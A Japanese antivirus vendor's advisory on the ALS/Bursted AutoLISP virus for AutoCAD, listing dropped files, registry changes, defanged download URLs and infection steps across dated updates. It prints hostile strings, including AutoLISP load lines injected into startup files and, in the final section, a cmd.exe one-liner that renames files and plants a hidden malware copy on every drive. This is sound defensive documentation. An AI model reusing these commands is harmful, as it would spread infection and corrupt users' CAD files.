ウイルス情報

ウイルス名 危険度

ALS/Bursted

企業ユーザ: 低
個人ユーザ: 低
種別 ウイルス
最小定義ファイル
(最初に検出を確認したバージョン)
7134
対応定義ファイル
(現在必要とされるバージョン)
7347 (現在7628)
対応エンジン 5.4.00.1158以降 (現在5600) 
エンジンバージョンの見分け方
別名 Microsoft - virus:alisp/bursted.bd Kaspersky - Virus.Acad.Bursted.a Symantec - ALS.Bursted.A Ikarus - Trojan.Lisp.Bursted.A Microsoft - Virus:ALisp/Bursted.BP Kaspersky - Virus.Acad.Bursted.b Symantec - ALS.Bursted.A Avast - ALS:Bursted-A Kaspersky - Virus.Acad.Bursted.b Fortinet - ACM/Bursted.B Microsoft - Virus:ALisp/Bursted.gen!A Symantec - ALS.Bursted.B Avast - ALS:Bursted-A Avira - ACAD/Bursted.C Kaspersky - Virus.Acad.Bursted.b Nod32 - ALS/Bursted.AO Microsoft - Worm:ALisp/Kenilfe.M NOD32 - ALS/Agent.AC IKarus - Worm.ALisp Microsoft - Worm:ALisp/Blemfox.A Symantec - ALS.Bursted.B Ikarus - Email-Worm.Acad Fortinet - ACM/Medre.A@mm Kaspersky - Worm.Acad.HighLight.c Microsoft - Worm:ALisp/Kenilfe.C Symantec - ALS.Kenilfe Avira - ACAD/HighLight.C F-secure - Trojan.ACAD.Bursted.N Microsoft - Virus:ALisp/Bursted.gen!A Symantec - ALS.Bursted.B Nod32 - ALS/Bursted.V Microsoft - Virus:ALisp/Bursted.BL NOD32 - ACAD.Agent.C Sophos - AL/Bursted-AA Symantec - ALS.Bursted.B Kaspersky - Trojan.Acad.Agent.d NOD32 - ACAD.Agent.C Microsoft - Virus:ALisp/Bursted.BL Symantec - ALS.Bursted.B Kaspersky: Trojan.Acad.Qfas.e BitDefender: Trojan.ACAD.QFas.A Ikarus: Trojan.Acad
情報掲載日 2010/12/09
発見日(米国日付) 2003/12/10
駆除補足 ウイルス駆除のヒント
概要 ウイルスの特徴 感染症状 感染方法 駆除方法

概要

・ALS/Burstedはウイルスです。ウイルスは繰り返し自己複製するプログラムで、感染システムがウイルスを他のシステムに拡散して、ウイルスをさらに繁殖させます。多くのウイルスには破壊的なペイロードが組み込まれていますが、通常はシステムからシステムに拡散する以外には何も行いません。

--2010年9月28日-----

ファイル情報:

  • MD5: 7A8D52C0A5B8A38CDC31EAE9F099664D
  • SHA1: 4F0310470FB53F2787820307440E48CF93293F1C

TOPへ戻る

ウイルスの特徴

---2014年2月12日更新---

・ALS/Burstedは、AutoCADアプリケーションのスクリプトの作成に使用するAutoLISPプログラミング言語を使って作成されたウイルスです。リムーバブルドライブおよびマップされたシステムドライブを介して拡散する可能性があります。

・ALS/Burstedは、ユーザがdwgファイルを開こうとすると、自身のスクリプトを自動的にロードします。また、autocad[.dwg]ファイルが格納されているすべての場所に自身をコピーします。

・ALS/Burstedは、AutoCADのSupportフォルダの場所(%AppData%\Autodesk\AutoCAD [年]\R[バージョン]\enu\Support\)を確認するため、「base.dcl」のファイルパスを検索します。

・ALS/Burstedは、ACADISO.LSPからのAutoCADの起動時に自身をロードするため、既存のグローバルACAD.LSPを編集または作成します。

・また、ALS/Burstedは、autocad[.dwg]描画ファイルを開く際に自身を自動的にロードするため、以下のコマンドを付加して、AutoCADのSupportフォルダにある「acad.lsp」および「acad.mnr」ファイルに感染します。

(load"acadiso") (princ)

・また、ALS/Burstedは以下のAutoCADコマンドの定義を消去します。

  • attedit
  • xref
  • xbind

・次に、ALS/Burstedはatteditコマンドをダミーコマンドに置き換えます。ダミーのatteditは「Select objects:」と表示してユーザにオブジェクトの選択を促し、さらに「Seltct objects: nfound」(nは数字)と表示し、最後に「n was not able to be attedit」というメッセージを表示します。

・実行時、以下の場所に自身をコピーします。

  • % AppData%\Autodesk\AutoCAD[年]\R[バージョン]\enu\Support\acad.lsp
  • %AppData%\Autodesk\AutoCAD 2006\R[バージョン]\enu\Support\acadiso.lsp
  • %Temp%\AdskCleanup.0001.dir.0000\PfdRun.pfd
  • %Temp%\AdskCleanup.0001.dir.0000\~de6c66.tmp
  • %Temp%\AdskCleanup.0001.dir.0000\~df394b.tmp
  • %Temp%\AdskCleanup.0001.dir.0000\~efe2.tmp
  • %Temp%\\UNDO.ac$

・以下はシステムで改変されるファイルです。

  • %AppData%Autodesk\AutoCAD [年]\R[バージョン]\enu\Support\acad.mnr
  • %AppData%Autodesk\AutoCAD [年]\R[バージョン]\enu\Support\Profiles\FixedProfile.aws
  • %AppData%Autodesk\AutoCAD [年]\R[バージョン]\enu\Support\Profiles\Unnamed Profile\Profile.aws
  • %AppData%Autodesk\AutoCAD [年]\R[バージョン]\enu\Support\RegisteredTools\AcTpTools.atc
  • %AppData%Autodesk\AutoCAD [年]\R[バージョン]\enu\Support\ToolPalette\AcTpCatalog.atc
  • %AppData%Autodesk\AutoCAD [年]\R[バージョン]\enu\Support\ToolPalette\Palettes\Annotation_A0CCA60A-AB56-4EFD-83A5-8764BC08CDA8.atc

・以下はシステムから削除されるレジストリキーです。

  • HKEY_LOCAL_MACHINE \SOFTWARE\Classes\Microsoft.StdDataFormats.1
  • HKEY_LOCAL_MACHINE \SOFTWARE\Classes\Microsoft.StdDataFormats.1\CLSID

・以下はシステムに追加されるレジストリキーです。

  • HKEY_LOCAL_MACHINE \SOFTWARE\Classes\DirectPlayVoice.AutoCAD.1
  • HKEY_LOCAL_MACHINE \SOFTWARE\Classes\DirectPlayVoice.AutoCAD.1\CLSID

・以下はシステムに追加されるレジストリキー値です。

  • HKEY_LOCAL_MACHINE \SOFTWARE\Classes\CLSID\{F052BAEB-B11D-05A4-2399-0727DCE7669E}\: "Microsoft Office 9"
  • HKEY_LOCAL_MACHINE \SOFTWARE\Classes\DirectPlayVoice.AutoCAD.1\CLSID\: "{6D022BCF-1586-0FAB-80BB-3F013EAF53AA}"
  • HKEY_LOCAL_MACHINE \SOFTWARE\Classes\DirectPlayVoice.AutoCAD.1\: "DirectPlayVoice Class"

・以下はシステムで改変されるレジストリキー値です。

  • HKEY_USERS \S-1-5-21-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\3DGS Configuration\GSHEIDI10\CustomHeidiDriver: ""
  • HKEY_USERS \S-1-5-21-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\3DGS Configuration\GSHEIDI10\CustomHeidiDriver: "wopengl8.hdi"

---2014年1月27日更新---

・ALS/Burstedは、AutoCADアプリケーションのスクリプトの作成に使用するAutoLISPプログラミング言語を使って作成されたウイルスです。リムーバブルドライブおよびマップされたシステムドライブを介して拡散する可能性があります。

・ALS/Burstedは、ユーザがdwgファイルを開こうとすると、自身のスクリプトを自動的にロードします。また、autocad[.dwg]ファイルが格納されているすべての場所に自身をコピーします。

・ALS/Burstedは以下のURLから実行ファイルをダウンロードするウイルスです。

  • hxxp://advg[削除]ch.com/love.scr

・実行時、以下の場所に自身をコピーします。

  • %System%\<ランダムな名前>.exe
  • %Windir%\<ランダムな名前>.exe

・実行時、以下のINIを作成します。

  • %System%\autorun.ini

・実行時、ALS/BurstedはLNKファイルを追加します。

・ユーザは電子メールとして以下のメッセージを受け取る可能性があります。

  • happy valentine day screen saver from hxxp://advg[削除]ch.com/love.scr -> eg:(hxxp://www.mydre[削除]ld.50webs.com,hxxp://advgoo[削除]spot.com)
  • golden lovers rose screen saver from hxxp://advg[削除]ch.com/love.scr -> eg:(hxxp://www.mydre[削除]ld.50webs.com,hxxp://advgoo[削除]spot.com)
  • happy valentine day screen saver from hxxp://advg[削除]ch.com/love.scr -> eg: (hxxp://www.mydre[削除]ld.50webs.com,hxxp://advgoo[削除]spot.com)
  • happy valentine day screen saver from hxxp://advg[削除]ch.com/love.scr -> eg: (hxxp://www.mydre[削除]ld.50webs.com,hxxp://advgoo[削除]spot.com)
  • golden lovers rose screen saver from hxxp://advg[削除]ch.com/love.scr -> eg: (hxxp://www.mydre[削除]ld.50webs.com,hxxp://advgoo[削除]spot.com)
  • happy valentine day screen saver from hxxp://advg[削除]ch.com/love.scr -> eg: (hxxp://www.mydre[削除]ld.50webs.com,hxxp://advgoo[削除]spot.com)
  • rose is always red ,see in hxxp://advg[削除]ch.com/love.scr -> eg: (hxxp://www.mydre[削除]ld.50webs.com,hxxp://advgoo[削除]spot.com)
  • rose is always red ,see in hxxp://advg[削除]ch.com/love.scr -> eg: (hxxp://www.mydre[削除]ld.50webs.com,hxxp://advgoo[削除]spot.com)
  • happy valentine day screen saver from hxxp://advg[削除]ch.com/love.scr -> eg:(hxxp://www.mydre[削除]ld.50webs.com,hxxp://advgoo[削除]spot.com)

・以下はシステムで改変されるレジストリキーです。

  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\"Default_Page_URL" = "Malcious site"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\"Default_Search_URL" = "Malcious site"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\"Search Page" = "Malcious site"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\"Start Page" = "Malcious site"
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\"Start Page" = "Malcious site
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\"Shell" = "Explorer.exe randomname_.exe"
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "Chrome3" Data: C:\WINDOWS\system32\chromechrist.exe
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "google" Data: hxxp://www.chrome10.com

・上記のレジストリ項目により、システムが起動するたびにALS/Burstedが実行されるようにします。


---2013年12月19日更新---

・ALS/Burstedは、AutoCADアプリケーションのスクリプトの作成に使用するAutoLISPプログラミング言語を使って作成されたウイルスです。

・ALS/Burstedは最初に以下のコマンドを使ってファイル名を取得し、ファイル名がDrawing1.dwgの場合、ファイルをDrawing1.dwgという名前で「My Documents」フォルダに保存します。

Lsp command: getvar "dwgname"

・次に、AutoCADのSupportフォルダの場所(%AppData%\Autodesk\AutoCAD [年]\R[バージョン]\enu\Support\)を確認するため、「base.dcl」のファイルパスを検索します。

・ALS/BurstedはAutoCADのSupportフォルダに「acadappp.lsp」が存在するか確認し、ファイルが存在しない場合は、自身を「acadappp.lsp」という名前でAutoCADのSupportフォルダにコピーし、描画ファイルが開かれると、ファイルが自動的にAutoCADによってロードされ、ALS/Burstedが実行されるようにします。

・また、以下のコマンドを付加することにより、AutoCADのSupportフォルダの「acad.mnl」ファイルに感染します。

(load "acadappp.lsp") (princ)

・ALS/Burstedは、ユーザが*.dwgを開こうとするたびに、「acad.lsp」ファイルおよび「acadapp.lsp」ファイルが存在するか確認し、これらのファイルが見つかった場合は、最初の行を読み取り、「;;;」という構文が存在することを確認します。この構文が見つからない場合は、ファイルの内容を「;;;」に置き換えます。

・また、*.dwgファイルと一緒に、現在作業中のフォルダに「acad.lsp」という名前で自身をコピーします。

・実行時、以下のファイルがシステムに追加されます。

%AppData%\Autodesk\AutoCAD [年]\R[バージョン]\enu\Support\acadappp.lsp

  • [*.dwg現在作業中のフォルダ]\acad.lsp
  • %appdata%\Autodesk\AutoCAD [年]\R[バージョン]\enu\Support\acadappp.lsp
  • %appdata%\Autodesk\AutoCAD [年]\R[バージョン]\enu\Support\acetmain.mnr
  • %USERPROFILE%\My Documents\Drawing1.dwg
  • %USERPROFILE%\My Documents\Drawing1.dwl

・以下はシステムで改変されるファイルです。

  • %AppData%\Autodesk\AutoCAD [年]\R[バージョン]\enu\Support\acad.mnl
  • %AppData%\Autodesk\AutoCAD [年]\R[バージョン]\enu\Support\acad.mnr

・また、実行時、以下のドメインに接続しようとします。

  • FS1

---2013年12月18日更新---

・ALS/Burstedは、AutoCADアプリケーションのスクリプトの作成に使用するAutoLISPプログラミング言語を使って作成されたウイルスです。リムーバブルドライブおよびマップされたシステムドライブを介して拡散する可能性があります。

・ALS/Burstedは、ユーザがdwgファイルを開こうとすると、自身のスクリプトを自動的にロードします。また、autocad[.dwg]ファイルが格納されているすべての場所に自身をコピーします。

・ALS/Burstedは、ACADISO.LSPからのAutoCADの起動時に自身をロードするため、既存のグローバルACAD.LSPを編集または作成します。

・また、ALS/Burstedは、autocad[.dwg]描画ファイルを開く際に自身を自動的にロードするため、以下のコマンドを付加して、AutoCADのSupportフォルダにある「acad.lsp」および「acad.mnr」ファイルに感染します。

(load"acadiso") (princ)

・また、ALS/Burstedは以下のAutoCADコマンドの定義を消去します。

  • attedit
  • xref
  • xbind

・次に、ALS/Burstedはatteditコマンドをダミーコマンドに置き換えます。ダミーのatteditは「Select objects:」と表示してユーザにオブジェクトの選択を促し、さらに「Seltct objects: nfound」(nは数字)と表示し、最後に「n was not able to be attedit」というメッセージを表示します。

・実行時、以下の場所に自身をコピーします。

  • %APPDATA%\Autodesk\AutoCAD [年]\R[バージョン]\enu\Support\acad.lsp
  • %APPDATA%\Autodesk\AutoCAD [年]\R[バージョン]\enu\Support\acadiso.lsp
  • %APPDATA%\Autodesk\AutoCAD [年]\R[バージョン]\enu\VLIDE.DSK
  • %TEMP%\AdskCleanup.0001.dir.0000\PfdRun.pfd
  • %TEMP%\AdskCleanup.0001.dir.0000\~de6c66.tmp
  • %TEMP%\AdskCleanup.0001.dir.0000\~df394b.tmp
  • %TEMP%\AdskCleanup.0001.dir.0000\~efe2.tmp
  • %TEMP%\UNDO.ac$

・以下はシステムで改変されるファイルです。

  • %APPDATA%Autodesk\AutoCAD [年]\R[バージョン]\enu\Support\acad.mnr
  • %APPDATA%Autodesk\AutoCAD [年]\R[バージョン]\enu\Support\Profiles\FixedProfile.aws
  • %APPDATA%Autodesk\AutoCAD [年]\R[バージョン]\enu\Support\Profiles\Unnamed Profile\Profile.aws
  • %APPDATA%Autodesk\AutoCAD [年]\R[バージョン]\enu\Support\RegisteredTools\AcTpTools.atc
  • %APPDATA%Autodesk\AutoCAD [年]\R[バージョン]\enu\Support\ToolPalette\AcTpCatalog.atc
  • %APPDATA%Autodesk\AutoCAD [年]\R[バージョン]\enu\Support\ToolPalette\Palettes\Annotation_A0CCA60A-AB56-4EFD-83A5-8764BC08CDA8.atc

・以下はシステムから削除されるレジストリキーです。

  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\awApi4.AcPpPaletteSet.3
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\awApi4.AcPpPaletteSet.3\CLSID

・以下はシステムに追加されるレジストリキー値です。

  • HKEY_USERS\S-1-5-21-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\FixedProfile\General Configuration\DYNMODE: 0x00000003
  • HKEY_USERS \S-1-5-21-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\Dialogs\Appload\Startup\NumStartup: "0"
  • HKEY_USERS \S-1-5-21-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\Dialogs\Appload\FileFilter: "AutoCAD Apps (*.arx;*.lsp;*.dvb;*.dbx;*.vlx;*.fas)"

・以下はシステムで改変されるレジストリキー値です。

  • HKEY_USERS \S-1-5-21-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\3DGS Configuration\GSHEIDI10\CustomHeidiDriver: ""
  • HKEY_USERS \S-1-5-21-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\3DGS Configuration\GSHEIDI10\CustomHeidiDriver: "wopengl8.hdi"

---2013年9月12日更新---

・ALS/Burstedは、AutoCADアプリケーションのスクリプトの作成に使用するAutoLISPプログラミング言語を使って作成されたウイルスです。

・ALS/BurstedはAutoCADのFast-Load LISPファイルです。Fast-Load LISPファイルはコンパイルされたLISPファイルで、通常、AutoCADの新しい機能を実装するのに使用されます。

・ALS/Burstedは、実行時、他の複数のファイルをユーザのマシンにダウンロードしようとする悪質なダウンローダです。ALS/Burstedには他のマシンに拡散する能力はないため、それ以外の方法により、感染マシンにドロップ(作成)される必要があります。そのため、通常、ALS/Burstedの感染には、感染したDWGファイルや他の悪質な実行ファイルがかかわっています。

自動的に実行されるようにするため、ALS/BurstedのファイルはACAD.FASという名前に変更され、AutoCADがインストールされているルートフォルダにコピーされます。AutoCADがロードされると、ALS/Burstedが自動的にロードされます。

・実行時、複数のファイルをユーザのマシンにダウンロードしようとします。

・実行時、HTTPおよびFTPを介して、以下のURLに接続します。

  • hxxp :// www.c[削除]s.com /z/lspdl.exe
  • hxxp :// cad[削除]9.gxidc.com /z/logo.gif
  • hxxp :// www.c[削除]s.com /z/httpurl.asp
  • hxxp :// www.c[削除]s.com /z/updadat.asp
  • hxxp :// www.c[削除]s.com /z/vbsupdat.asp
  • fxp :// ken[削除]6.org /jhdl.exe

・分析時、上記のサイトはオフラインか、悪質なファイルを提供していませんでした。

・上記のファイルはディスクのさまざまな場所にドロップ(作成)されます。また、システムの再感染を防ぐため、感染を示すマーカーとしていくつかのファイルを作成します。

・以下のファイルがシステムに作成または改変されます。

  • %Windir%\web\logo.exe
  • %Windir%\web\safemodelogo.gif
  • %ACADROOT%\Fonts\isohztxt.shx
  • %Windir%\DivX.fin
  • %Windir%\\system32\SHFR.CMD
  • %PROGRAMFILES%\Microsoft Shared\MSInfo\DivX.cmd
  • %PROGRAMFILES%\temp.vbe

---2012年11月19日更新---

・ALS/Burstedは、AutoCADアプリケーションのスクリプトの作成に使用するAutoLISPプログラミング言語を使って作成されたウイルスです。リムーバブルドライブおよびマップされたシステムドライブを介して拡散する可能性があります。

・ALS/Burstedは、ユーザがdwgファイルを開こうとすると、自身のスクリプトを自動的にロードします。また、autocadファイルが格納されているすべての場所に自身をコピーします。

・実行時、以下の場所に自身をコピーします。

  • %Appdata%Autodesk\AutoCAD [年]\R[バージョン]\enu\Support\acad.fas
  • %Appdata%Autodesk\AutoCAD [年]\R[バージョン]\enu\Support\cad.fas
  • %UserProfileP%\Desktop\cad.fas
  • %TEMP%\AdskCleanup.0001.dir.0000\PfdRun.pfd
  • %TEMP%\AdskCleanup.0001.dir.0000\~de6c66.tmp
  • %TEMP%\AdskCleanup.0001.dir.0000\~df394b.tmp
  • %TEMP%\AdskCleanup.0001.dir.0000\~efe2.tmp
  • %TEMP%\UNDO.ac$
  • %Programfiles%AutoCAD [年]\Express\acad.fas
  • %Programfiles%AutoCAD [年]\Express\cad.fas
  • %Programfiles%AutoCAD [年]\Fonts\acad.fas
  • %Programfiles%AutoCAD [年]\Fonts\cad.fas
  • %Programfiles%AutoCAD [年]\Help\acad.fas
  • %Programfiles%AutoCAD [年]\Help\cad.fas
  • %Programfiles%AutoCAD [年]\Support\Color\acad.fas
  • %Programfiles%AutoCAD [年]\Support\Color\cad.fas
  • %Programfiles%AutoCAD [年]\Support\acad.fas
  • %Programfiles%AutoCAD [年]\Support\cad.fas
  • %WINDIR%\system32\Acad.fas
  • %WINDIR%\system32\???¶????????.rar
  • %WINDIR%\Acad.fas

・また、実行時、以下のURL/IPに接続しようとします。

  • smtp.q[削除].com
  • 113.108.[削除].44

・以下はシステムに追加されるレジストリキーです。

  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{GUID}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{GUID}\InprocServer32
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{GUID}
  • HKEY_USERS\S-1-5-21-[不定]\Software\Microsoft\Internet Account Manager
  • HKEY_USERS\S-1-5-21-[不定]\Software\Microsoft\Internet Account Manager\Accounts
  • HKEY_USERS\S-1-5-21-[不定]\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC
  • HKEY_USERS\S-1-5-21-[不定]\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot
  • HKEY_USERS\S-1-5-21-[不定]\Software\Microsoft\Internet Account Manager\Accounts\VeriSign
  • HKEY_USERS\S-1-5-21-[不定]\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere
  • HKEY_USERS\S-1-5-21-[不定]\Software\Microsoft\Windows Script Host
  • HKEY_USERS\S-1-5-21-[不定]\Software\Microsoft\Windows Script Host\Settings

・以下はシステムに追加されるレジストリキーです。

  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{GUID}\InprocServer32\: "%WINDIR%\system32\cmcfg32.dll"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{GUID}\InprocServer32\ThreadingModel: "Apartment"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{GUID}\: "Microsoft Wave File"
  • HKEY_USERS\S-1-5-21-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\Drawing Window\SDIMode: 0x00000000
  • HKEY_USERS\S-1-5-21-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\General\UseMRUConfig: 0x00000000
  • HKEY_USERS\S-1-5-21-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\General\HideSystemPrinters: 0x00000000

・上記のレジストリキー値により、AutoCADのシステムプリンタを隠すオプションがALS/Burstedによって無効にされるようにします。

  • HKEY_USERS\S-1-5-21-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\General\PLSPOOLALERT: 0x00000000
  • HKEY_USERS\S-1-5-21-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\General\PAPERUPDATE: 0x00000000
  • HKEY_USERS\S-1-5-21-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\General\PLOTLEGACY: 0x00000000
  • HKEY_USERS\S-1-5-21-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\General\PSTYLEPOLICY: 0x00000001
  • HKEY_USERS\S-1-5-21-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\General\OLEQUALITY: 0x00000003
  • HKEY_USERS\S-1-5-21-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\General\Anyport: 0x0000000
  • HKEY_USERS\S-1-5-21-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\General\Validation Policy: 0x00000003
  • HKEY_USERS\S-1-5-21-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\General\Validation Strategy: 0x00000001
  • HKEY_USERS\S-1-5-21-[不定]\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\
    o LDAP Server ID: 0x00000003
    o Account Name: "WhoWhere Internet Directory Service"
    o LDAP Server: "ldap.whowhere.com"
    o LDAP URL: "http://www.whowhere.com"
    o LDAP Search Return: 0x00000064
    o LDAP Timeout: 0x0000003C
    o LDAP Authentication: 0x00000000
    o LDAP Simple Search: 0x00000001
    o LDAP Logo: "%ProgramFiles%\Common Files\Services\whowhere.bmp"
  • HKEY_USERS\S-1-5-21-[不定]\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\
    o LDAP Server ID: 0x00000002
    o Account Name: "VeriSign Internet Directory Service"
    o LDAP Server: "directory.verisign.com"
    o LDAP URL: "http://www.verisign.com"
    o LDAP Search Return: 0x00000064
    o LDAP Timeout: 0x0000003C
    o LDAP Authentication: 0x00000000
    o LDAP Search Base: "NULL"
    o LDAP Simple Search: 0x00000001
    o LDAP Logo: "%ProgramFiles%\Common Files\Services\verisign.bmp"
  • HKEY_USERS\S-1-5-21-[不定]\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\
    o LDAP Server ID: 0x00000001
    o Account Name: "Bigfoot Internet Directory Service"
    o LDAP Server: "ldap.bigfoot.com"
    o LDAP URL: "http://www.bigfoot.com"
    o LDAP Search Return: 0x00000064
    o LDAP Timeout: 0x0000003C
    o LDAP Authentication: 0x00000000
    o LDAP Simple Search: 0x00000001
    o LDAP Logo: "%ProgramFiles%\Common Files\Services\bigfoot.bmp"
  • HKEY_USERS\S-1-5-21-[不定]\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\
    o LDAP Server ID: 0x00000000
    o Account Name: "Active Directory"
    o LDAP Server: "NULL"
    o LDAP Search Return: 0x00000064
    o LDAP Timeout: 0x0000003C
    o LDAP Authentication: 0x00000002
    o LDAP Simple Search: 0x00000000
    o LDAP Bind DN: 0x00000000
    o LDAP Port: 0x00000CC4
    o LDAP Resolve Flag: 0x00000001
    o LDAP Secure Connection: 0x00000000
    o LDAP User Name: "NULL"
    o LDAP Search Base: "NULL"
  • HKEY_USERS\S-1-5-21-[不定]\Software\Microsoft\Internet Account Manager\Accounts\
    o AssociatedID: EB 47 C0 B3 BA 48 A2 40 AE 96 42 B4 9A 3E 4D 9B
    o PreConfigVer: 0x00000004
  • HKEY_USERS\S-1-5-21-[不定]\Software\Microsoft\Internet Account Manager\Accounts\PreConfigVerNTDS: 0x00000001
  • HKEY_USERS\S-1-5-21-[不定]\Software\Microsoft\Internet Account Manager\Server ID: 0x00000004
  • HKEY_USERS\S-1-5-21-[不定]\Software\Microsoft\Internet Account Manager\Default LDAP Account: "Active Directory GC"
  • The following are the registry keys have been added to the system:
  • HKEY_USERS\S-1-5-21-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\3DGS Configuration\GSHEIDI10\CustomHeidiDriver: ""
  • HKEY_USERS\S-1-5-21-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\3DGS Configuration\GSHEIDI10\CustomHeidiDriver: "wopengl8.hdi"
  • HKEY_USERS\S-1-5-21-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\Drawing Recovery\LoggedFileCount: 0x00000000
  • HKEY_USERS\S-1-5-21-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\Drawing Recovery\LoggedFileCount: 0x00000001
  • HKEY_USERS\S-1-5-21-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\General\ACAD: "%Appdata%Autodesk\AutoCAD [年]\R[バージョン]\enu\support;%Programfiles%AutoCAD [年]\support;%Programfiles%AutoCAD [年]\fonts;%Programfiles%AutoCAD [年]\help;%Programfiles%AutoCAD [年]\Express;%Programfiles%AutoCAD [年]\support\color;"
  • HKEY_USERS\S-1-5-21-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\General\ACAD: "%Appdata%Autodesk\AutoCAD [年]\R[バージョン]\enu\support;%Programfiles%AutoCAD [年]\support;%Programfiles%AutoCAD [年]\fonts;%Programfiles%AutoCAD [年]\help;%Programfiles%AutoCAD [年]\Express;%Programfiles%AutoCAD [年]\support\color;%Programfiles%AutoCAD [年]\Express

---2012年11月19日更新---

・ALS/Burstedは、AutoCADアプリケーションのスクリプトの作成に使用するAutoLISPプログラミング言語を使って作成されたウイルスです。

・ALS/Burstedはリムーバブルドライブおよびマップされたシステムドライブを介して拡散するウイルスです。

・ALS/Burstedは、ユーザがdwgファイルを開こうとすると、自身のスクリプトを自動的にロードします。また、autocadファイルが格納されているすべての場所に自身をコピーします。また、acad.mnlファイルに以下のコマンドを追加します。

  • (setvar "cmdecho" 0)
  • (command "AF971")

・実行時、以下のコマンドを実行しようとします。

  • "%windir%\system32\cmd.exe" /c U??????&@echo off&setlocal enabledelayedexpansion&for %d in ( A E) do (for /f "delims=" %i in ('dir /s /b /a:d %d:\') do (cd /d %i&for %i in (acad.vlx acad.sys lcm.fas acadsmu.fas acaddoc.lsp acadapq.lsp acadappp.lsp acadapp.lsp acad.lsp dwgrun.bat winfas.ini acadiso.lsp) do (if exist %i attrib -r -h %i&rename %i %i_bak))&(if exist acad.fas (attrib -r -h acad.fas&copy /y "%ProgramFiles%\AutoCAD [年]\fonts\isomianyi.shx" acad.fas&attrib +h +r acad.fas) else (if exist *.dwg copy /y "%ProgramFiles%\AutoCAD [年]\fonts\isomianyi.shx" acad.fas&attrib +h +r acad.fas)))&echo MZ>%d:\pagefile&attrib +h %d:\pagefile

・実行時、以下の場所に自身をコピーします。

  • %Appdata%\Autodesk\AutoCAD [年]\R[バージョン]\enu\Support\acad.fas
  • %UserProfile%\Desktop\e62e\acad.fas
  • %UserProfile%\Local Settings\Application Data\Autodesk\AutoCAD [年]\R[バージョン]\enu\Template\acad.fas
  • %Temp%\AutoCAD[年]Trial\Bin\acadFeui\Program Files\Root\Express\acad.fas
  • %Temp%\AutoCAD[年]Trial\Bin\acadFeui\Program Files\Root\Help\Tutorials\createTransmittal\acad.fas
  • %Temp%\AutoCAD[年]Trial\Bin\acadFeui\Program Files\Root\Help\Tutorials\crossReference\Models\acad.fas
  • %Temp%\AutoCAD[年]Trial\Bin\acadFeui\Program Files\Root\Help\Tutorials\crossReference\acad.fas
  • %Temp%\AutoCAD[年]Trial\Bin\acadFeui\Program Files\Root\Help\Tutorials\PlaceView\Models\acad.fas
  • %Temp%\AutoCAD[年]Trial\Bin\acadFeui\Program Files\Root\Help\Tutorials\PlaceView\acad.fas
  • %Temp%\AutoCAD[年]Trial\Bin\acadFeui\Program Files\Root\Help\Tutorials\PublishSheetSet\acad.fas
